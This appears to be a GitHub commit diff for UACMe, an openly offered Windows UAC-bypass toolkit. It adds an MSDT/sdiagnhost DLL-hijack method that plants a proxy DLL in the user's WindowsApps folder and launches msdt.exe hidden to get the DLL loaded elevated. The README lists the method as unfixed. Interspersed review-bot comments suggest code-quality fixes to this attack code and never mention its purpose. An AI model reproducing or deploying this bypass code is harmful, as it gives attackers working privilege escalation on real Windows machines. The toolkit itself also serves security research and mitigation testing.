Merge pull request #119 from hfiref0x/v3.5.9
v 3.5.9
hfiref0x authored Feb 5, 2022
2 parents 70dffcd + aed8778 commit 92e84a7
Showing 19 changed files with 231 additions and 106 deletions.
2 changes: 1 addition & 1 deletion LICENSE.md
@@ -1,4 +1,4 @@
Copyright (c) 2014 - 2021, UACMe authors
Copyright (c) 2014 - 2022, UACMe authors

Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
13 changes: 12 additions & 1 deletion README.md
Expand Up @@ -733,6 +733,16 @@ First parameter is number of method to use, second is optional command (executab
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.5.8
72. Author: Emeric Nasi
* Type: Dll Hijack
* Method: Dll path search abuse
* Target(s): \syswow64\msdt.exe, \system32\sdiagnhost.exe
* Component(s): BluetoothDiagnosticUtil.dll
* Implementation: ucmMsdtMethod
* Works from: Windows 10 (10240)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.5.9

</details>

Expand Down Expand Up @@ -835,9 +845,10 @@ https://devblogs.microsoft.com/oldnewthing/20160816-00/?p=94105
* UACMe 3.5, WD and the ways of mitigation, https://swapcontext.blogspot.com/2020/10/uacme-35-wd-and-ways-of-mitigation.html
* UAC bypasses from COMAutoApprovalList, https://swapcontext.blogspot.com/2020/11/uac-bypasses-from-comautoapprovallist.html
* Utilizing Programmatic Identifiers (ProgIDs) for UAC Bypasses, https://v3ded.github.io/redteam/utilizing-programmatic-identifiers-progids-for-uac-bypasses
* MSDT DLL Hijack UAC bypass, https://blog.sevagas.com/?MSDT-DLL-Hijack-UAC-bypass

# Authors

(c) 2014 - 2021 UACMe Project
(c) 2014 - 2022 UACMe Project

[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Fhfiref0x%2FUACME&count_bg=%2379C83D&title_bg=%23555555&icon=&icon_color=%23E7E7E7&title=hits&edge_flat=false)](https://hits.seeyoufarm.com)
Binary file modified Source/Akagi/bin64res.h
Binary file not shown.
1 change: 1 addition & 0 deletions Source/Akagi/bin64res.rc
Expand Up @@ -2,6 +2,7 @@
#include "winres.h"
LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
IDR_FUBUKI64 RCDATA "bin\\fubuki64.cd"
IDR_FUBUKI32 RCDATA "bin\\fubuki32.cd"
IDR_AKATSUKI64 RCDATA "bin\\akatsuki64.cd"
IDR_KAMIKAZE RCDATA "bin\\kamikaze.cd"
IDR_SECRETS RCDATA "bin\\secrets64.bin"
16 changes: 13 additions & 3 deletions Source/Akagi/global.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2014 - 2021
* (C) COPYRIGHT AUTHORS, 2014 - 2022
*
* TITLE: GLOBAL.H
*
* VERSION: 3.58
* VERSION: 3.59
*
* DATE: 01 Dec 2021
* DATE: 04 Feb 2022
*
* Common header file for the program support routines.
*
Expand Down Expand Up @@ -45,11 +45,13 @@
#include "bin64res.h"
#define FUBUKI_ID IDR_FUBUKI64
#define AKATSUKI_ID IDR_AKATSUKI64
#define FUBUKI32_ID IDR_FUBUKI32
#define KAMIKAZE_ID IDR_KAMIKAZE
#else
#include "bin32res.h"
#define FUBUKI_ID IDR_FUBUKI32
#define AKATSUKI_ID PAYLOAD_ID_NONE //this module unavailable for 32 bit
#define FUBUKI32_ID IDR_FUBUKI32
#define KAMIKAZE_ID IDR_KAMIKAZE
#endif

Expand Down Expand Up @@ -149,5 +151,13 @@ typedef UINT(WINAPI *pfnEntryPoint)(
_In_ BOOL OutputToDebugger
);

typedef struct _UACME_THREAD_CONTEXT {
TEB_ACTIVE_FRAME Frame;
pfnEntryPoint ucmMain;
DWORD ReturnedResult;
ULONG OptionalParameterLength;
LPWSTR OptionalParameter;
} UACME_THREAD_CONTEXT, * PUACME_THREAD_CONTEXT;

extern PUACMECONTEXT g_ctx;
extern HINSTANCE g_hInstance;
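Review bot: `UACME_THREAD_CONTEXT` is introduced without any comment on its layout contract; with `Frame` (a `TEB_ACTIVE_FRAME`) placed first, it looks like the context is meant to be recovered from a `TEB_ACTIVE_FRAME *` by casting or `CONTAINING_RECORD`, and if so that ordering requirement should be written down before someone reorders the fields. A comment above the struct such as `// Frame must remain the first member: the context is recovered from its TEB_ACTIVE_FRAME pointer` would capture it; I cannot see the consumer from this hunk, so confirm against the code that walks the frame list. The pointer typedef `* PUACME_THREAD_CONTEXT` also carries a stray space after the asterisk; `*PUACME_THREAD_CONTEXT` matches the conventional form.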
13 changes: 4 additions & 9 deletions Source/Akagi/main.c
@@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2014 - 2021
* (C) COPYRIGHT AUTHORS, 2014 - 2022
*
* TITLE: MAIN.C
*
* VERSION: 3.57
* VERSION: 3.59
*
* DATE: 01 Nov 2021
* DATE: 02 Feb 2022
*
* Program entry point.
*
Expand Down Expand Up @@ -217,10 +217,5 @@ NTSTATUS WINAPI ucmMain(
#pragma comment(linker, "/ENTRY:main")
VOID __cdecl main()
{
#ifdef _WIN64
__writegsqword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer), (DWORD_PTR)ucmMain);
#else
__writefsdword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer), (DWORD_PTR)ucmMain);
#endif
ExitProcess(StubInit());
ExitProcess(StubInit(ucmMain));
}
99 changes: 96 additions & 3 deletions Source/Akagi/methods/hybrids.c
@@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2015 - 2021
* (C) COPYRIGHT AUTHORS, 2015 - 2022
*
* TITLE: HYBRIDS.C
*
* VERSION: 3.58
* VERSION: 3.59
*
* DATE: 01 Dec 2021
* DATE: 02 Feb 2022
*
* Hybrid UAC bypass methods.
*
Expand Down Expand Up @@ -1045,3 +1045,96 @@ NTSTATUS ucmJunctionMethod(

return MethodResult;
}

/*
* ucmMsdtMethod
*
* Purpose:
*
* Bypass UAC by dll hijack of sdiagnhost.
* https://blog.sevagas.com/?MSDT-DLL-Hijack-UAC-bypass
*
*/
NTSTATUS ucmMsdtMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize
)
{
BOOLEAN bCleanupNeeded = FALSE;
UINT i;
NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
#ifndef _WIN64
NTSTATUS ntStatus = STATUS_ACCESS_DENIED;
#endif
WCHAR szPath[MAX_PATH * 2];
WCHAR szApp[MAX_PATH + 1];
WCHAR szParams[MAX_PATH * 2];

#ifndef _WIN64
if (g_ctx->IsWow64) {
ntStatus = supEnableDisableWow64Redirection(TRUE);
if (!NT_SUCCESS(ntStatus))
return ntStatus;
}
#endif

do {

RtlSecureZeroMemory(&szPath, sizeof(szPath));
if (!SHGetSpecialFolderPath(NULL, (LPWSTR)&szPath, CSIDL_LOCAL_APPDATA, FALSE))
break;

supConcatenatePaths(szPath, TEXT("Microsoft\\WindowsApps"), MAX_PATH);
supConcatenatePaths(szPath, BLUETOOTHDIAGNOSTICUTIL_DLL, MAX_PATH);

if (!supWriteBufferToFile(szPath, ProxyDll, ProxyDllSize))
break;

bCleanupNeeded = TRUE;

_strcpy(szApp, g_ctx->szSystemRoot);
supConcatenatePaths(szApp, SYSWOW64_DIR, MAX_PATH);
supConcatenatePaths(szApp, MSDT_EXE, MAX_PATH);

_strcpy(szParams, TEXT("-path "));
_strcat(szParams, g_ctx->szSystemRoot);
_strcat(szParams, TEXT("diagnostics\\index\\BluetoothDiagnostic.xml -skip yes"));

if (supRunProcess2(szApp,
szParams,
NULL,
SW_HIDE,
10000))
{
MethodResult = STATUS_SUCCESS;
}

} while (FALSE);


if (bCleanupNeeded) {
i = 5;
do {

if (DeleteFile(szPath))
break;

Sleep(1000);
i--;
} while (i);

}


#ifndef _WIN64
if (g_ctx->IsWow64) {
supEnableDisableWow64Redirection(FALSE);
}
#endif

#ifdef _DEBUG
supSetGlobalCompletionEvent();
#endif

return MethodResult;
}
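Review bot: `szApp` is declared `MAX_PATH + 1` while the sibling buffers are `MAX_PATH * 2`, and `_strcpy(szApp, g_ctx->szSystemRoot)` copies into it unbounded before `supConcatenatePaths` applies its `MAX_PATH` limit; unless `szSystemRoot` is guaranteed shorter than `MAX_PATH` by its declaration (not visible here), that copy has no length check. The `(LPWSTR)&szPath` argument to `SHGetSpecialFolderPath` casts a pointer-to-array to `LPWSTR` where the array would decay on its own, so `szPath` suffices and keeps the type checker in play; `RtlSecureZeroMemory(&szPath, sizeof(szPath))` can likewise take `szPath` directly. The cleanup path drops the return value of `supEnableDisableWow64Redirection(FALSE)` while the enable call above is checked; a debug trace on failure would at least make a stuck redirection state visible.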
10 changes: 7 additions & 3 deletions Source/Akagi/methods/hybrids.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2015 - 2021
* (C) COPYRIGHT AUTHORS, 2015 - 2022
*
* TITLE: HYBRIDS.H
*
* VERSION: 3.57
* VERSION: 3.59
*
* DATE: 01 Nov 2020
* DATE: 02 Feb 2022
*
* Prototypes and definitions for hybrid methods.
*
Expand Down Expand Up @@ -53,6 +53,10 @@ NTSTATUS ucmJunctionMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize);

NTSTATUS ucmMsdtMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize);

//
// Post execution cleanup routines.
//
17 changes: 13 additions & 4 deletions Source/Akagi/methods/methods.c
@@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2015 - 2021
* (C) COPYRIGHT AUTHORS, 2015 - 2022
*
* TITLE: METHODS.C
*
* VERSION: 3.58
* VERSION: 3.59
*
* DATE: 01 Dec 2021
* DATE: 04 Feb 2022
*
* UAC bypass dispatch.
*
Expand Down Expand Up @@ -45,6 +45,7 @@ UCM_API(MethodFwCplLua2);
UCM_API(MethodProtocolHijack);
UCM_API(MethodPca);
UCM_API(MethodCurVer);
UCM_API(MethodMsdt);

ULONG UCM_WIN32_NOT_IMPLEMENTED[] = {
UacMethodWow64Logger,
Expand Down Expand Up @@ -131,7 +132,8 @@ UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {
{ MethodProtocolHijack, { NT_WIN10_REDSTONE5, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
{ MethodPca, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodCurVer, { NT_WIN10_THRESHOLD1, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodNICPoison, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }
{ MethodNICPoison, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodMsdt, { NT_WIN10_THRESHOLD1, MAXDWORD }, FUBUKI32_ID, FALSE, FALSE, TRUE }
};

/*
Expand Down Expand Up @@ -746,3 +748,10 @@ UCM_API(MethodCurVer)

#endif
}

UCM_API(MethodMsdt)
{
return ucmMsdtMethod(
Parameter->PayloadCode,
Parameter->PayloadSize);
}
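Review bot: The new `ucmMethodsDispatchTable` entry presumably has to sit at the index equal to `UacMethodMsdt` in the `UCM_METHOD` enum (methods.h in this same commit), and neither file states that coupling, so a future entry added in one place only would silently shift every later method. A comment on the table, `// entries must follow UCM_METHOD enum order; the method id is the table index`, plus a compile-time check along the lines of `C_ASSERT(RTL_NUMBER_OF(ucmMethodsDispatchTable) == UacMethodMax);` would catch that; I cannot see how `UCM_DISPATCH_ENTRY_MAX` relates to `UacMethodMax`, so the exact expression may need adjusting. The positional initializer `{ MethodMsdt, { NT_WIN10_THRESHOLD1, MAXDWORD }, FUBUKI32_ID, FALSE, FALSE, TRUE }` also leaves the three trailing flags unexplained at the point of use; designated initializers naming the flag fields would make each new row self-describing.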
7 changes: 4 additions & 3 deletions Source/Akagi/methods/methods.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2014 - 2021
* (C) COPYRIGHT AUTHORS, 2014 - 2022
*
* TITLE: METHODS.H
*
* VERSION: 3.58
* VERSION: 3.59
*
* DATE: 21 Nov 2021
* DATE: 04 Feb 2022
*
* Prototypes and definitions for UAC bypass methods table.
*
Expand Down Expand Up @@ -91,6 +91,7 @@ typedef enum _UCM_METHOD {
UacMethodPca, //+
UacMethodCurVer, //+
UacMethodNICPoison2, //+
UacMethodMsdt, //+
UacMethodMax,
UacMethodInvalid = 0xabcdef
} UCM_METHOD;